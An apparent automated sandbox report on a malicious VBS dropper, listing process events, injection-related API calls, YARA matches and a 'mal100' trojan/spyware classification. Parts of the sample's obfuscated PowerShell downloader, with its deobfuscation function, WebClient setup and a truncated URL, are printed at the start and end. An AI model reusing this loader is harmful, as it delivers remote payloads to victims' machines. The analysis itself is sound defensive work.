.aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no DeJump to behavior
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F9E3C8 NtAcceptConnectPort,23_3_00007DF416F9E3C8
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F9E3E8 NtAcceptConnectPort,23_3_00007DF416F9E3E8
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F9F32C NtAcceptConnectPort,free,23_3_00007DF416F9F32C
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F9F180 malloc,RtlDosPathNameToNtPathName_U,NtAcceptConnectPort,NtAcceptConnectPort,free,23_3_00007DF416F9F180
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F9E25C NtAcceptConnectPort,23_3_00007DF416F9E25C
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F9E094 NtAcceptConnectPort,23_3_00007DF416F9E094
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F9E150 NtAcceptConnectPort,23_3_00007DF416F9E150
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F9E170 NtAcceptConnectPort,23_3_00007DF416F9E170
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F9E910 calloc,DuplicateHandle,NtAcceptConnectPort,free,NtAcceptConnectPort,NtAcceptConnectPort,23_3_00007DF416F9E910
                        Source: C:\Windows\System32\svchost.exeCode function: 23_2_00000155E72D15C0 NtAcceptConnectPort,23_2_00000155E72D15C0
                        Source: C:\Windows\System32\svchost.exeCode function: 23_2_00000155E72D1CF4 NtAcceptConnectPort,CloseHandle,23_2_00000155E72D1CF4
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_3_00007DF474201958 calloc,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtQueryInformationProcess,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,34_3_00007DF474201958
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_3_00007DF474201CE8 CreateProcessW,NtResumeThread,CloseHandle,free,34_3_00007DF474201CE8
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D63158 NtAcceptConnectPort,34_2_0000028186D63158
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D6290C NtAcceptConnectPort,34_2_0000028186D6290C
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D62A20 NtAcceptConnectPort,34_2_0000028186D62A20
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D62EC8 NtAcceptConnectPort,34_2_0000028186D62EC8
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D62E84 NtAcceptConnectPort,34_2_0000028186D62E84
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D62CAC NtAcceptConnectPort,34_2_0000028186D62CAC
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D62DAC NtAcceptConnectPort,34_2_0000028186D62DAC
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D62DDC NtAcceptConnectPort,34_2_0000028186D62DDC
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D62D80 NtAcceptConnectPort,34_2_0000028186D62D80
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_00007DF4741B2E90 NtQuerySystemInformation,NtQuerySystemInformation,34_2_00007DF4741B2E90
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_00007DF4741E25D4 NtQuerySystemInformation,NtQuerySystemInformation,34_2_00007DF4741E25D4
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_00007DF47420199C calloc,NtQueryInformationProcess,NtReadVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,34_2_00007DF47420199C
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_00007DF474201E64 CreateProcessW,NtResumeThread,CloseHandle,34_2_00007DF474201E64
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E58413970 NtQuerySystemInformation,35_2_0000026E58413970
                        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3423B8E25_2_00007FFD3423B8E2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3423A7265_2_00007FFD3423A726
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3423B0F25_2_00007FFD3423B0F2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34236CFA5_2_00007FFD34236CFA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD342365F35_2_00007FFD342365F3
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34233DF25_2_00007FFD34233DF2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3423262D5_2_00007FFD3423262D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD342342315_2_00007FFD34234231
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD342352D35_2_00007FFD342352D3
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34239F255_2_00007FFD34239F25
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34233B6F5_2_00007FFD34233B6F
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD342363F35_2_00007FFD342363F3
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD342364435_2_00007FFD34236443
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34238C445_2_00007FFD34238C44
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3423841D5_2_00007FFD3423841D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34305B7A5_2_00007FFD34305B7A
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00000155E73E2C5223_3_00000155E73E2C52
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00000155E73E4A5023_3_00000155E73E4A50
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00000155E73E1BBC23_3_00000155E73E1BBC
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00000155E73E27B223_3_00000155E73E27B2
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00000155E73E5E9423_3_00000155E73E5E94
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00000155E73E559423_3_00000155E73E5594
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00000155E73E591423_3_00000155E73E5914
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00000155E73E250D23_3_00000155E73E250D
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F908CC23_3_00007DF416F908CC
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F7286C23_3_00007DF416F7286C
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416FF071C23_3_00007DF416FF071C
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF41705D75C23_3_00007DF41705D75C
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF41705757823_3_00007DF417057578
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF41706A59823_3_00007DF41706A598
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF41705E5F423_3_00007DF41705E5F4
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416FC564023_3_00007DF416FC5640
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF41701A3C823_3_00007DF41701A3C8
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416FE13BC23_3_00007DF416FE13BC
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF4170523D823_3_00007DF4170523D8
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416FAD42C23_3_00007DF416FAD42C
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416FDD2A023_3_00007DF416FDD2A0
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416FC52F423_3_00007DF416FC52F4
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF4170632F823_3_00007DF4170632F8
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF41705A19C23_3_00007DF41705A19C
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F821F023_3_00007DF416F821F0
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416FED24823_3_00007DF416FED248
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF41705E0B023_3_00007DF41705E0B0
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F910BC23_3_00007DF416F910BC
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416FCFF7823_3_00007DF416FCFF78
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F75F9C23_3_00007DF416F75F9C
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F7105823_3_00007DF416F71058
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F90EF423_3_00007DF416F90EF4
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF41706DF6C23_3_00007DF41706DF6C
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416FDCE4823_3_00007DF416FDCE48
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416FCCC8423_3_00007DF416FCCC84
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF41705DC9423_3_00007DF41705DC94
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416FC3CE823_3_00007DF416FC3CE8
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416FCECF823_3_00007DF416FCECF8
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416FDCD3823_3_00007DF416FDCD38
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF41704DBC823_3_00007DF41704DBC8
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416FC6BE423_3_00007DF416FC6BE4
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F9CBE823_3_00007DF416F9CBE8
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF41705BC6823_3_00007DF41705BC68
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF41706AAB423_3_00007DF41706AAB4
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F87AE023_3_00007DF416F87AE0
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416FD0AD423_3_00007DF416FD0AD4
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF41705EB0C23_3_00007DF41705EB0C
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416FB8B2823_3_00007DF416FB8B28
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416FDCB5C23_3_00007DF416FDCB5C
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F7F9C023_3_00007DF416F7F9C0
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF4170119B423_3_00007DF4170119B4
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416FC395C23_3_00007DF416FC395C
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F8E97023_3_00007DF416F8E970
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF41705E77423_3_00007DF41705E774
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416FE582423_3_00007DF416FE5824
                        Source: C:\Windows\System32\svchost.exeCode function: 23_2_00000155E72D0C7023_2_00000155E72D0C70
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_3_00000281871B1F4034_3_00000281871B1F40
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_3_00000281871B027B34_3_00000281871B027B
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_3_00000281871B271834_3_00000281871B2718
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_3_00000281871B170E34_3_00000281871B170E
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_3_00000281871B366034_3_00000281871B3660
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_3_00007DF47420392C34_3_00007DF47420392C
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_3_00007DF474204EFC34_3_00007DF474204EFC
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_3_00007DF47420220434_3_00007DF474202204
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D6321834_2_0000028186D63218
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D5262C34_2_0000028186D5262C
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D5C2D034_2_0000028186D5C2D0
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D8F15834_2_0000028186D8F158
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D860EC34_2_0000028186D860EC
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D9011434_2_0000028186D90114
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D850A434_2_0000028186D850A4
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D7786834_2_0000028186D77868
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D7089834_2_0000028186D70898
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D6723434_2_0000028186D67234
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D9422134_2_0000028186D94221
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D8522434_2_0000028186D85224
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D90A4434_2_0000028186D90A44
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D8420C34_2_0000028186D8420C
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D8F9A434_2_0000028186D8F9A4
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D6D73034_2_0000028186D6D730
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D8474434_2_0000028186D84744
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D7467834_2_0000028186D74678
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D6CE7034_2_0000028186D6CE70
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D8669C34_2_0000028186D8669C
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D78E8834_2_0000028186D78E88
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D7E02834_2_0000028186D7E028
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D9104834_2_0000028186D91048
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D8AFF034_2_0000028186D8AFF0
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D65FCC34_2_0000028186D65FCC
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D6FD3C34_2_0000028186D6FD3C
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D774EC34_2_0000028186D774EC
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D8F4B834_2_0000028186D8F4B8
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D514D034_2_0000028186D514D0
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D77E5834_2_0000028186D77E58
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D855BC34_2_0000028186D855BC
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D89DA834_2_0000028186D89DA8
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D6C5D834_2_0000028186D6C5D8
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D6758034_2_0000028186D67580
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D9156434_2_0000028186D91564
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D85D8434_2_0000028186D85D84
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D6EABC34_2_0000028186D6EABC
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D80C4C34_2_0000028186D80C4C
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D6E40434_2_0000028186D6E404
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D96C0834_2_0000028186D96C08
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D8D3C834_2_0000028186D8D3C8
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_00007DF4741C27AC34_2_00007DF4741C27AC
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_00007DF4741BF04834_2_00007DF4741BF048
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_00007DF4741C9C7434_2_00007DF4741C9C74
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_00007DF4741BF8E034_2_00007DF4741BF8E0
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_00007DF4741C152C34_2_00007DF4741C152C
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_00007DF4741C01A034_2_00007DF4741C01A0
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_00007DF4741C0E7434_2_00007DF4741C0E74
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_00007DF4741C330834_2_00007DF4741C3308
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_00007DF4741E8FDC34_2_00007DF4741E8FDC
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_00007DF4741E9C1834_2_00007DF4741E9C18
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_00007DF4741E720034_2_00007DF4741E7200
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_00007DF4741E848034_2_00007DF4741E8480
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_00007DF4742022CC34_2_00007DF4742022CC
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E5841BD4035_2_0000026E5841BD40
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E5842E5FC35_2_0000026E5842E5FC
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E58429E1035_2_0000026E58429E10
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E5843C62035_2_0000026E5843C620
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E5842A5D835_2_0000026E5842A5D8
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E5841C6AC35_2_0000026E5841C6AC
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E5842AEF035_2_0000026E5842AEF0
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E58441F2835_2_0000026E58441F28
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E58418ECC35_2_0000026E58418ECC
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E584326D435_2_0000026E584326D4
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E5841D6DC35_2_0000026E5841D6DC
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E5843478035_2_0000026E58434780
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E5843C78835_2_0000026E5843C788
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E58428F9835_2_0000026E58428F98
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E5842287C35_2_0000026E5842287C
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E5842B03535_2_0000026E5842B035
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E5842F84C35_2_0000026E5842F84C
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E584298F835_2_0000026E584298F8
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E5841C0BC35_2_0000026E5841C0BC
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E5842A94035_2_0000026E5842A940
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E58429A7835_2_0000026E58429A78
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E58428A6035_2_0000026E58428A60
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E5843426435_2_0000026E58434264
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E5843237435_2_0000026E58432374
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E5843333035_2_0000026E58433330
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E584293B435_2_0000026E584293B4
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E58432BC035_2_0000026E58432BC0
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E5841745435_2_0000026E58417454
                        Source: C:\Windows\System32\dllhost.exeCode function: 35_2_0000026E58433C6035_2_0000026E58433C60
                        Source: g8ix97hz.vbsInitial sample: Strings found which are bigger than 50
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4452
                        Source: unknownProcess created: Commandline size = 4452
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4452Jump to behavior
                        Source: amsi32_7756.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 524, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 7756, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@43/120@12/11
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F7286C CreateToolhelp32Snapshot,Thread32First,CloseHandle,SuspendThread,23_3_00007DF416F7286C
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Even.LarJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:504:120:WilError_03
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:936:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
                        Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-7ec072bc-c1d3-175365-1034abd211c2}
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4f23m5ou.xke.ps1Jump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\g8ix97hz.vbs"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=524
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7756
                        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\g8ix97hz.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumber
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . 